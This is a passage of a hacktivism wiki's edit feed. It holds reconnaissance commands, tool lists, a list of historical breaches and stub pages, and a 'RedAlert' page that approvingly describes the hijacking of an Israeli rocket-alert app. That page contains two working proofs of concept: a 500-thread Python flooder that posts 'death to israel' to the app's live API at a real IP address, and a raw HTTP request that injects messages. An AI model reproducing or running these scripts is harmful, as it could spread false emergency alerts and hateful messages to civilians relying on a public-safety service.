* &amp;lt;code&amp;gt;echo &#039;[https://bgp.he.net/search?search%5Bsearch%5D=nasa&amp;amp;commit=Search AS21556]&#039; | [https://github.com/j3ssie/Metabigor metabigor] net --asn -v&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;amass intel -active -org nasa -max-dns-queries 2500 | awk -F, &#039;{print $1}&#039; ORS=&#039;,&#039; | sed &#039;s/,$//&#039; | xargs -P3 -I@ -d &#039;,&#039; amass intel -active -asn @ -max-dns-queries 2500| sort -u&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Google hacking ===&lt;br /&gt;
Refine your google searches (also works on Bing and DuckDuckGo) to discover paths, files, vulnerabilities, endpoints, login portals and technology.&lt;br /&gt;
* (Book) Google Hacking for Penetration Testers 3rd Edition&lt;br /&gt;
* https://github.com/Proviesec/google-dorks&lt;br /&gt;
* https://www.exploit-db.com/google-hacking-database&lt;br /&gt;
* https://dorksearch.com&lt;br /&gt;
* https://taksec.github.io/google-dorks-bug-bounty&lt;br /&gt;
&lt;br /&gt;
=== Intercepting proxies ===&lt;br /&gt;
* https://mitmproxy.org&lt;br /&gt;
* https://portswigger.net/burp&lt;br /&gt;
* https://www.zaproxy.org&lt;br /&gt;
* https://github.com/projectdiscovery/proxify&lt;br /&gt;
&lt;br /&gt;
== Exploitation ==&lt;br /&gt;
For automatic exploit tools and payloads, see [[exploitation]].&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=RedAlert&amp;diff=1664</id>
		<title>RedAlert</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=RedAlert&amp;diff=1664"/>
		<updated>2023-10-12T15:59:36Z</updated>

		<summary type="html">&lt;p&gt;Booda: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Hacktivist group [https://t.me/AnonGhostOfficialTeam AnonGhost] hacked a [https://play.google.com/store/apps/details/Alerta+roja:+Israel?id=com.kobisnir.redalert Red Alert application] that Israelis use to be alerted for when Hamas performs rocket fire attacks via an [https://enlacehacktivista.org/index.php?title=Hacking_APIs API vulnerability], allowing them to send red alert messages on mass to anyone and everyone who uses the app, allowing them to say anything they like.&lt;br /&gt;
&lt;br /&gt;
== Explanation of the Hack ==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;POC 1:&#039;&#039;&#039;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import requests&lt;br /&gt;
import threading&lt;br /&gt;
import time&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
url = &amp;quot;http://54.214.248.70:80/redalert/and/api/chat.php&amp;quot;&lt;br /&gt;
headers = {&lt;br /&gt;
    &amp;quot;Content-Type&amp;quot;: &amp;quot;application/x-www-form-urlencoded; charset=UTF-8&amp;quot;,&lt;br /&gt;
    &amp;quot;User-Agent&amp;quot;: &amp;quot;Dalvik/2.1.0 (Linux; U; Android 13; M2101K7BG Build/TP1A.220624.014)&amp;quot;,&lt;br /&gt;
    &amp;quot;Host&amp;quot;: &amp;quot;54.214.248.70&amp;quot;,&lt;br /&gt;
    &amp;quot;Connection&amp;quot;: &amp;quot;Keep-Alive&amp;quot;,&lt;br /&gt;
    &amp;quot;Accept-Encoding&amp;quot;: &amp;quot;gzip&amp;quot;,&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
data = {&lt;br /&gt;
    &amp;quot;msg&amp;quot;: &amp;quot;death to israel&amp;quot;,&lt;br /&gt;
    &amp;quot;method&amp;quot;: &amp;quot;sendmsg&amp;quot;,&lt;br /&gt;
    &amp;quot;time&amp;quot;: &amp;quot;🇵🇸&amp;quot;,&lt;br /&gt;
    &amp;quot;hash&amp;quot;: &amp;quot;f1f416dd17fb4668098a8b02c845021f&amp;quot;,&lt;br /&gt;
    &amp;quot;token&amp;quot;: &amp;quot;fWIzje8JYuI:APA91bGbeHvcsQpsPBucVxgUZcUGIT8ZXBNCKGSNdHmxdI0BfXW-idB6qvFTLZhBBI3jmVdBawsmCSPhkeDD5g_JKz6n7Q3ohltrJOiKHOJl47Sv0417E70hbykh8lfhLvD9_GeTN9Me&amp;quot;,&lt;br /&gt;
    &amp;quot;ts&amp;quot;: &amp;quot;1696713616907&amp;quot;,&lt;br /&gt;
    &amp;quot;username&amp;quot;: &amp;quot;࿕&amp;quot;,&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
num_threads = 500  &lt;br /&gt;
num_requests = 20000  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
def send_request():&lt;br /&gt;
    for _ in range(num_requests // num_threads):&lt;br /&gt;
        response = requests.post(url, headers=headers, data=data)&lt;br /&gt;
        print(response.text)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
threads = []&lt;br /&gt;
for _ in range(num_threads):&lt;br /&gt;
    thread = threading.Thread(target=send_request)&lt;br /&gt;
    threads.append(thread)&lt;br /&gt;
    thread.start()&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
for thread in threads:&lt;br /&gt;
    thread.join()&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;POC 2:&#039;&#039;&#039;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
POST /redalert/and/api/chat.php?msg=AnonGhost&amp;amp;method=sendmsg&amp;amp;time=7%3A13&amp;amp;hash=52bd01a926202bc0e5e7ba68270e4705&amp;amp;token=FUCKISRAEL&amp;amp;ts=1696720382270&amp;amp;username=AnonGhost&amp;amp;&amp;amp; HTTP/1.1&lt;br /&gt;
Host: 54.214.248.70&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36&lt;br /&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7&lt;br /&gt;
Accept-Encoding: gzip, deflate, br&lt;br /&gt;
Accept-Language: en-US,en;q=0.9&lt;br /&gt;
Connection: close&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
== Media Coverage ==&lt;br /&gt;
# https://x.com/GroupIB_TI/status/1711234869060358562&lt;br /&gt;
# https://thecyberexpress.com/redalert-cyberattack-anonghost-nuclear-alerts&lt;br /&gt;
# https://youtu.be/6zYloNKD-08?si=GIk6CqhPlN0HAotR&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=RedAlert&amp;diff=1663</id>
		<title>RedAlert</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=RedAlert&amp;diff=1663"/>
		<updated>2023-10-12T15:46:21Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* Media Coverage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&#039;&#039;&#039;NOTE:&#039;&#039;&#039; This page is under construction&lt;br /&gt;
&lt;br /&gt;
== Explanation of the Hack ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Media Coverage ==&lt;br /&gt;
# https://x.com/GroupIB_TI/status/1711234869060358562&lt;br /&gt;
# https://thecyberexpress.com/redalert-cyberattack-anonghost-nuclear-alerts&lt;br /&gt;
# https://youtu.be/6zYloNKD-08?si=GIk6CqhPlN0HAotR&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Rules_of_engagement_-_Red_Cross&amp;diff=1662</id>
		<title>Rules of engagement - Red Cross</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Rules_of_engagement_-_Red_Cross&amp;diff=1662"/>
		<updated>2023-10-11T02:21:37Z</updated>

		<summary type="html">&lt;p&gt;Booda: Created page with &amp;quot;&amp;#039;&amp;#039;&amp;#039;NOTE:&amp;#039;&amp;#039;&amp;#039; This page is under construction  == Media Coverage == # https://www.bbc.com/news/technology-66998064&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&#039;&#039;&#039;NOTE:&#039;&#039;&#039; This page is under construction&lt;br /&gt;
&lt;br /&gt;
== Media Coverage ==&lt;br /&gt;
# https://www.bbc.com/news/technology-66998064&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Hacker_History&amp;diff=1661</id>
		<title>Hacker History</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Hacker_History&amp;diff=1661"/>
		<updated>2023-10-11T02:20:08Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* 2023 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 2005 ==&lt;br /&gt;
* [[Protest Warrior]]&lt;br /&gt;
&lt;br /&gt;
== 2008 ==&lt;br /&gt;
* [[Sarah Palin emails]]&lt;br /&gt;
&lt;br /&gt;
== 2010 ==&lt;br /&gt;
* [[SRS Electronic Declaration System]]&lt;br /&gt;
* [[Operation Payback]]&lt;br /&gt;
&lt;br /&gt;
== 2011 ==&lt;br /&gt;
* [[Chinga la Migra]]&lt;br /&gt;
* [[CorruptBrazil]]&lt;br /&gt;
* [[Fuck FBI Friday]]&lt;br /&gt;
* [[HBGary]]&lt;br /&gt;
* [[LeakyMails]]&lt;br /&gt;
* [[Shooting Sheriffs Saturday]]&lt;br /&gt;
* [[Sownage]]&lt;br /&gt;
* [[Stratfor]]&lt;br /&gt;
* [[RedHack]]&lt;br /&gt;
* [[LulzSec Sony]]&lt;br /&gt;
&lt;br /&gt;
== 2012 ==&lt;br /&gt;
* [[Apple UDIDs]]&lt;br /&gt;
* [[CSLEA]]&lt;br /&gt;
* [[Norton AntiVirus]]&lt;br /&gt;
* [[Syria emails]]&lt;br /&gt;
* [[Bureau Of Justice]]&lt;br /&gt;
* [[CabinCr3w]]&lt;br /&gt;
&lt;br /&gt;
== 2013 ==&lt;br /&gt;
* [[Project AIG]]&lt;br /&gt;
&lt;br /&gt;
== 2014 ==&lt;br /&gt;
* [[LulzSecPeru]]&lt;br /&gt;
* [[Gamma Group]]&lt;br /&gt;
* [[Russian Interior Ministry]]&lt;br /&gt;
&lt;br /&gt;
== 2015 ==&lt;br /&gt;
* [[wikipedia:Football Leaks]]&lt;br /&gt;
* [[Hacking Team]]&lt;br /&gt;
&lt;br /&gt;
== 2016 ==&lt;br /&gt;
* [[Berat Albayrak Emails]]&lt;br /&gt;
* [[Panama Papers]]&lt;br /&gt;
* [[Surkov Leaks]]&lt;br /&gt;
* [[Catalan police union]]&lt;br /&gt;
&lt;br /&gt;
== 2017 ==&lt;br /&gt;
* [[Bob Otto emails]]&lt;br /&gt;
* [[Cellebrite]]&lt;br /&gt;
* [[Flexispy]]&lt;br /&gt;
* [[Freedom Hosting II]]&lt;br /&gt;
&lt;br /&gt;
== 2018 ==&lt;br /&gt;
* [[Salvini emails]]&lt;br /&gt;
* [[Doxxing-Adventskalender]]&lt;br /&gt;
&lt;br /&gt;
== 2019 ==&lt;br /&gt;
* [[GorraLeaks]]&lt;br /&gt;
* [[Paco Leaks]]&lt;br /&gt;
* [[Milico Leaks]]&lt;br /&gt;
* [[Capital One]]&lt;br /&gt;
* [[GdP (Hambacher Forest)]]&lt;br /&gt;
* [[Perceptics]]&lt;br /&gt;
* [[Cayman National Bank and Trust (Isle of Man)]]&lt;br /&gt;
* [[Iron March]]&lt;br /&gt;
* [[Varela Leaks]]&lt;br /&gt;
&lt;br /&gt;
== 2020 ==&lt;br /&gt;
* [[Luanda Leaks]]&lt;br /&gt;
* [[BlueLeaks]]&lt;br /&gt;
* [[Intel exconfidential Lake]]&lt;br /&gt;
&lt;br /&gt;
== 2021 ==&lt;br /&gt;
* [[Gab]]&lt;br /&gt;
* [[Myanmar Investments]]&lt;br /&gt;
* [[American Patriots Three Percent‎]]&lt;br /&gt;
* [[Verkada]]&lt;br /&gt;
* [[Sons of Confederate Veterans]]&lt;br /&gt;
* [[MagaCoin]]&lt;br /&gt;
* [[Electronic Arts]]&lt;br /&gt;
* [[Tea Party Patriots]]&lt;br /&gt;
* [[Cyber Partisans]]&lt;br /&gt;
* [[HART]]&lt;br /&gt;
* [[Policía Nacional Civil de El Salvador]]&lt;br /&gt;
* [[Epik]]&lt;br /&gt;
* [[Oath Keepers]]&lt;br /&gt;
* [[America&#039;s Frontline Doctors]]&lt;br /&gt;
* [[Twitch]]&lt;br /&gt;
* [[Attila Hildmann‎]]&lt;br /&gt;
* [[Metropolitan Police Department D.C.]]&lt;br /&gt;
* [[Academy of Public Administration (Belarus)]]&lt;br /&gt;
* [[AnibalLeaks]]&lt;br /&gt;
* [[Texas GOP]]&lt;br /&gt;
&lt;br /&gt;
== 2022 ==&lt;br /&gt;
* [[Myanmar Internal Revenue Department]]&lt;br /&gt;
* [[Patriot Front]]&lt;br /&gt;
* [[Belarusian Railway]]&lt;br /&gt;
* [[Pronico]]&lt;br /&gt;
* [[Roskomnadzor]]&lt;br /&gt;
* [[OpRussia]]&lt;br /&gt;
* [[Nauru Police Force]]&lt;br /&gt;
* [[Extractivist Leaks/es]]&lt;br /&gt;
* [[Uber]]&lt;br /&gt;
* [[Liberty Counsel]]&lt;br /&gt;
* [[Fiscalia|Fiscalia of Colombia]]&lt;br /&gt;
* [[Fuerzas Represivas]]&lt;br /&gt;
* [[InfraGard]]&lt;br /&gt;
&lt;br /&gt;
== 2023 ==&lt;br /&gt;
* [[Odin Intelligence]]&lt;br /&gt;
* [[TSA No Fly List]]&lt;br /&gt;
* [[SiegedSec NATO]]&lt;br /&gt;
* [[LetMeSpy]]&lt;br /&gt;
* [[Greater Manchester Police (GMP)]]&lt;br /&gt;
* [[RedAlert]]&lt;br /&gt;
* [[WebDetetive]]&lt;br /&gt;
* [[SpyHide]]&lt;br /&gt;
* [[Rules of engagement - Red Cross]]&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=SpyHide&amp;diff=1660</id>
		<title>SpyHide</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=SpyHide&amp;diff=1660"/>
		<updated>2023-10-11T02:15:26Z</updated>

		<summary type="html">&lt;p&gt;Booda: Created page with &amp;quot;&amp;#039;&amp;#039;&amp;#039;NOTE:&amp;#039;&amp;#039;&amp;#039; This page is under construction  == Media Coverage == # https://maia.crimew.gay/posts/fuckstalkerware-2 # https://ddosecrets.com/wiki/SpyHide&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&#039;&#039;&#039;NOTE:&#039;&#039;&#039; This page is under construction&lt;br /&gt;
&lt;br /&gt;
== Media Coverage ==&lt;br /&gt;
# https://maia.crimew.gay/posts/fuckstalkerware-2&lt;br /&gt;
# https://ddosecrets.com/wiki/SpyHide&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Hacker_History&amp;diff=1659</id>
		<title>Hacker History</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Hacker_History&amp;diff=1659"/>
		<updated>2023-10-11T02:14:40Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* 2023 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 2005 ==&lt;br /&gt;
* [[Protest Warrior]]&lt;br /&gt;
&lt;br /&gt;
== 2008 ==&lt;br /&gt;
* [[Sarah Palin emails]]&lt;br /&gt;
&lt;br /&gt;
== 2010 ==&lt;br /&gt;
* [[SRS Electronic Declaration System]]&lt;br /&gt;
* [[Operation Payback]]&lt;br /&gt;
&lt;br /&gt;
== 2011 ==&lt;br /&gt;
* [[Chinga la Migra]]&lt;br /&gt;
* [[CorruptBrazil]]&lt;br /&gt;
* [[Fuck FBI Friday]]&lt;br /&gt;
* [[HBGary]]&lt;br /&gt;
* [[LeakyMails]]&lt;br /&gt;
* [[Shooting Sheriffs Saturday]]&lt;br /&gt;
* [[Sownage]]&lt;br /&gt;
* [[Stratfor]]&lt;br /&gt;
* [[RedHack]]&lt;br /&gt;
* [[LulzSec Sony]]&lt;br /&gt;
&lt;br /&gt;
== 2012 ==&lt;br /&gt;
* [[Apple UDIDs]]&lt;br /&gt;
* [[CSLEA]]&lt;br /&gt;
* [[Norton AntiVirus]]&lt;br /&gt;
* [[Syria emails]]&lt;br /&gt;
* [[Bureau Of Justice]]&lt;br /&gt;
* [[CabinCr3w]]&lt;br /&gt;
&lt;br /&gt;
== 2013 ==&lt;br /&gt;
* [[Project AIG]]&lt;br /&gt;
&lt;br /&gt;
== 2014 ==&lt;br /&gt;
* [[LulzSecPeru]]&lt;br /&gt;
* [[Gamma Group]]&lt;br /&gt;
* [[Russian Interior Ministry]]&lt;br /&gt;
&lt;br /&gt;
== 2015 ==&lt;br /&gt;
* [[wikipedia:Football Leaks]]&lt;br /&gt;
* [[Hacking Team]]&lt;br /&gt;
&lt;br /&gt;
== 2016 ==&lt;br /&gt;
* [[Berat Albayrak Emails]]&lt;br /&gt;
* [[Panama Papers]]&lt;br /&gt;
* [[Surkov Leaks]]&lt;br /&gt;
* [[Catalan police union]]&lt;br /&gt;
&lt;br /&gt;
== 2017 ==&lt;br /&gt;
* [[Bob Otto emails]]&lt;br /&gt;
* [[Cellebrite]]&lt;br /&gt;
* [[Flexispy]]&lt;br /&gt;
* [[Freedom Hosting II]]&lt;br /&gt;
&lt;br /&gt;
== 2018 ==&lt;br /&gt;
* [[Salvini emails]]&lt;br /&gt;
* [[Doxxing-Adventskalender]]&lt;br /&gt;
&lt;br /&gt;
== 2019 ==&lt;br /&gt;
* [[GorraLeaks]]&lt;br /&gt;
* [[Paco Leaks]]&lt;br /&gt;
* [[Milico Leaks]]&lt;br /&gt;
* [[Capital One]]&lt;br /&gt;
* [[GdP (Hambacher Forest)]]&lt;br /&gt;
* [[Perceptics]]&lt;br /&gt;
* [[Cayman National Bank and Trust (Isle of Man)]]&lt;br /&gt;
* [[Iron March]]&lt;br /&gt;
* [[Varela Leaks]]&lt;br /&gt;
&lt;br /&gt;
== 2020 ==&lt;br /&gt;
* [[Luanda Leaks]]&lt;br /&gt;
* [[BlueLeaks]]&lt;br /&gt;
* [[Intel exconfidential Lake]]&lt;br /&gt;
&lt;br /&gt;
== 2021 ==&lt;br /&gt;
* [[Gab]]&lt;br /&gt;
* [[Myanmar Investments]]&lt;br /&gt;
* [[American Patriots Three Percent‎]]&lt;br /&gt;
* [[Verkada]]&lt;br /&gt;
* [[Sons of Confederate Veterans]]&lt;br /&gt;
* [[MagaCoin]]&lt;br /&gt;
* [[Electronic Arts]]&lt;br /&gt;
* [[Tea Party Patriots]]&lt;br /&gt;
* [[Cyber Partisans]]&lt;br /&gt;
* [[HART]]&lt;br /&gt;
* [[Policía Nacional Civil de El Salvador]]&lt;br /&gt;
* [[Epik]]&lt;br /&gt;
* [[Oath Keepers]]&lt;br /&gt;
* [[America&#039;s Frontline Doctors]]&lt;br /&gt;
* [[Twitch]]&lt;br /&gt;
* [[Attila Hildmann‎]]&lt;br /&gt;
* [[Metropolitan Police Department D.C.]]&lt;br /&gt;
* [[Academy of Public Administration (Belarus)]]&lt;br /&gt;
* [[AnibalLeaks]]&lt;br /&gt;
* [[Texas GOP]]&lt;br /&gt;
&lt;br /&gt;
== 2022 ==&lt;br /&gt;
* [[Myanmar Internal Revenue Department]]&lt;br /&gt;
* [[Patriot Front]]&lt;br /&gt;
* [[Belarusian Railway]]&lt;br /&gt;
* [[Pronico]]&lt;br /&gt;
* [[Roskomnadzor]]&lt;br /&gt;
* [[OpRussia]]&lt;br /&gt;
* [[Nauru Police Force]]&lt;br /&gt;
* [[Extractivist Leaks/es]]&lt;br /&gt;
* [[Uber]]&lt;br /&gt;
* [[Liberty Counsel]]&lt;br /&gt;
* [[Fiscalia|Fiscalia of Colombia]]&lt;br /&gt;
* [[Fuerzas Represivas]]&lt;br /&gt;
* [[InfraGard]]&lt;br /&gt;
&lt;br /&gt;
== 2023 ==&lt;br /&gt;
* [[Odin Intelligence]]&lt;br /&gt;
* [[TSA No Fly List]]&lt;br /&gt;
* [[SiegedSec NATO]]&lt;br /&gt;
* [[LetMeSpy]]&lt;br /&gt;
* [[Greater Manchester Police (GMP)]]&lt;br /&gt;
* [[RedAlert]]&lt;br /&gt;
* [[WebDetetive]]&lt;br /&gt;
* [[SpyHide]]&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=WebDetetive&amp;diff=1658</id>
		<title>WebDetetive</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=WebDetetive&amp;diff=1658"/>
		<updated>2023-10-11T02:14:09Z</updated>

		<summary type="html">&lt;p&gt;Booda: Created page with &amp;quot;&amp;#039;&amp;#039;&amp;#039;NOTE:&amp;#039;&amp;#039;&amp;#039; This page is under construction  == Media Coverage == # https://ddosecrets.com/wiki/WebDetetive&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&#039;&#039;&#039;NOTE:&#039;&#039;&#039; This page is under construction&lt;br /&gt;
&lt;br /&gt;
== Media Coverage ==&lt;br /&gt;
# https://ddosecrets.com/wiki/WebDetetive&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Hacker_History&amp;diff=1657</id>
		<title>Hacker History</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Hacker_History&amp;diff=1657"/>
		<updated>2023-10-11T02:13:50Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* 2023 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 2005 ==&lt;br /&gt;
* [[Protest Warrior]]&lt;br /&gt;
&lt;br /&gt;
== 2008 ==&lt;br /&gt;
* [[Sarah Palin emails]]&lt;br /&gt;
&lt;br /&gt;
== 2010 ==&lt;br /&gt;
* [[SRS Electronic Declaration System]]&lt;br /&gt;
* [[Operation Payback]]&lt;br /&gt;
&lt;br /&gt;
== 2011 ==&lt;br /&gt;
* [[Chinga la Migra]]&lt;br /&gt;
* [[CorruptBrazil]]&lt;br /&gt;
* [[Fuck FBI Friday]]&lt;br /&gt;
* [[HBGary]]&lt;br /&gt;
* [[LeakyMails]]&lt;br /&gt;
* [[Shooting Sheriffs Saturday]]&lt;br /&gt;
* [[Sownage]]&lt;br /&gt;
* [[Stratfor]]&lt;br /&gt;
* [[RedHack]]&lt;br /&gt;
* [[LulzSec Sony]]&lt;br /&gt;
&lt;br /&gt;
== 2012 ==&lt;br /&gt;
* [[Apple UDIDs]]&lt;br /&gt;
* [[CSLEA]]&lt;br /&gt;
* [[Norton AntiVirus]]&lt;br /&gt;
* [[Syria emails]]&lt;br /&gt;
* [[Bureau Of Justice]]&lt;br /&gt;
* [[CabinCr3w]]&lt;br /&gt;
&lt;br /&gt;
== 2013 ==&lt;br /&gt;
* [[Project AIG]]&lt;br /&gt;
&lt;br /&gt;
== 2014 ==&lt;br /&gt;
* [[LulzSecPeru]]&lt;br /&gt;
* [[Gamma Group]]&lt;br /&gt;
* [[Russian Interior Ministry]]&lt;br /&gt;
&lt;br /&gt;
== 2015 ==&lt;br /&gt;
* [[wikipedia:Football Leaks]]&lt;br /&gt;
* [[Hacking Team]]&lt;br /&gt;
&lt;br /&gt;
== 2016 ==&lt;br /&gt;
* [[Berat Albayrak Emails]]&lt;br /&gt;
* [[Panama Papers]]&lt;br /&gt;
* [[Surkov Leaks]]&lt;br /&gt;
* [[Catalan police union]]&lt;br /&gt;
&lt;br /&gt;
== 2017 ==&lt;br /&gt;
* [[Bob Otto emails]]&lt;br /&gt;
* [[Cellebrite]]&lt;br /&gt;
* [[Flexispy]]&lt;br /&gt;
* [[Freedom Hosting II]]&lt;br /&gt;
&lt;br /&gt;
== 2018 ==&lt;br /&gt;
* [[Salvini emails]]&lt;br /&gt;
* [[Doxxing-Adventskalender]]&lt;br /&gt;
&lt;br /&gt;
== 2019 ==&lt;br /&gt;
* [[GorraLeaks]]&lt;br /&gt;
* [[Paco Leaks]]&lt;br /&gt;
* [[Milico Leaks]]&lt;br /&gt;
* [[Capital One]]&lt;br /&gt;
* [[GdP (Hambacher Forest)]]&lt;br /&gt;
* [[Perceptics]]&lt;br /&gt;
* [[Cayman National Bank and Trust (Isle of Man)]]&lt;br /&gt;
* [[Iron March]]&lt;br /&gt;
* [[Varela Leaks]]&lt;br /&gt;
&lt;br /&gt;
== 2020 ==&lt;br /&gt;
* [[Luanda Leaks]]&lt;br /&gt;
* [[BlueLeaks]]&lt;br /&gt;
* [[Intel exconfidential Lake]]&lt;br /&gt;
&lt;br /&gt;
== 2021 ==&lt;br /&gt;
* [[Gab]]&lt;br /&gt;
* [[Myanmar Investments]]&lt;br /&gt;
* [[American Patriots Three Percent‎]]&lt;br /&gt;
* [[Verkada]]&lt;br /&gt;
* [[Sons of Confederate Veterans]]&lt;br /&gt;
* [[MagaCoin]]&lt;br /&gt;
* [[Electronic Arts]]&lt;br /&gt;
* [[Tea Party Patriots]]&lt;br /&gt;
* [[Cyber Partisans]]&lt;br /&gt;
* [[HART]]&lt;br /&gt;
* [[Policía Nacional Civil de El Salvador]]&lt;br /&gt;
* [[Epik]]&lt;br /&gt;
* [[Oath Keepers]]&lt;br /&gt;
* [[America&#039;s Frontline Doctors]]&lt;br /&gt;
* [[Twitch]]&lt;br /&gt;
* [[Attila Hildmann‎]]&lt;br /&gt;
* [[Metropolitan Police Department D.C.]]&lt;br /&gt;
* [[Academy of Public Administration (Belarus)]]&lt;br /&gt;
* [[AnibalLeaks]]&lt;br /&gt;
* [[Texas GOP]]&lt;br /&gt;
&lt;br /&gt;
== 2022 ==&lt;br /&gt;
* [[Myanmar Internal Revenue Department]]&lt;br /&gt;
* [[Patriot Front]]&lt;br /&gt;
* [[Belarusian Railway]]&lt;br /&gt;
* [[Pronico]]&lt;br /&gt;
* [[Roskomnadzor]]&lt;br /&gt;
* [[OpRussia]]&lt;br /&gt;
* [[Nauru Police Force]]&lt;br /&gt;
* [[Extractivist Leaks/es]]&lt;br /&gt;
* [[Uber]]&lt;br /&gt;
* [[Liberty Counsel]]&lt;br /&gt;
* [[Fiscalia|Fiscalia of Colombia]]&lt;br /&gt;
* [[Fuerzas Represivas]]&lt;br /&gt;
* [[InfraGard]]&lt;br /&gt;
&lt;br /&gt;
== 2023 ==&lt;br /&gt;
* [[Odin Intelligence]]&lt;br /&gt;
* [[TSA No Fly List]]&lt;br /&gt;
* [[SiegedSec NATO]]&lt;br /&gt;
* [[LetMeSpy]]&lt;br /&gt;
* [[Greater Manchester Police (GMP)]]&lt;br /&gt;
* [[RedAlert]]&lt;br /&gt;
* [[WebDetetive]]&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=LetMeSpy&amp;diff=1656</id>
		<title>LetMeSpy</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=LetMeSpy&amp;diff=1656"/>
		<updated>2023-10-11T02:11:50Z</updated>

		<summary type="html">&lt;p&gt;Booda: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&#039;&#039;&#039;NOTE:&#039;&#039;&#039; This page is under construction&lt;br /&gt;
&lt;br /&gt;
== Media Coverage ==&lt;br /&gt;
# https://ddosecrets.com/wiki/LetMeSpy | [http://ddosxlvzzow7scc7egy75gpke54hgbg2frahxzaw6qq5osnzm7wistid.onion/wiki/LetMeSpy Tor]&lt;br /&gt;
# https://techcrunch.com/2023/06/27/letmespy-hacked-spyware-thousands&lt;br /&gt;
# https://www.malwarebytes.com/blog/podcast/2023/07/spy-vs-spy-exploring-the-letmespy-hack-with-maia-arson-crimew&lt;br /&gt;
# https://maia.crimew.gay/posts/fuckstalkerware-1&lt;br /&gt;
# https://www.theregister.com/2023/06/27/letmespy_stalkerware_app_hacked&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=LetMeSpy&amp;diff=1655</id>
		<title>LetMeSpy</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=LetMeSpy&amp;diff=1655"/>
		<updated>2023-10-11T02:11:21Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* References */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== References ==&lt;br /&gt;
# https://ddosecrets.com/wiki/LetMeSpy | [http://ddosxlvzzow7scc7egy75gpke54hgbg2frahxzaw6qq5osnzm7wistid.onion/wiki/LetMeSpy Tor]&lt;br /&gt;
# https://techcrunch.com/2023/06/27/letmespy-hacked-spyware-thousands&lt;br /&gt;
# https://www.malwarebytes.com/blog/podcast/2023/07/spy-vs-spy-exploring-the-letmespy-hack-with-maia-arson-crimew&lt;br /&gt;
# https://maia.crimew.gay/posts/fuckstalkerware-1&lt;br /&gt;
# https://www.theregister.com/2023/06/27/letmespy_stalkerware_app_hacked&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Greater_Manchester_Police_(GMP)&amp;diff=1654</id>
		<title>Greater Manchester Police (GMP)</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Greater_Manchester_Police_(GMP)&amp;diff=1654"/>
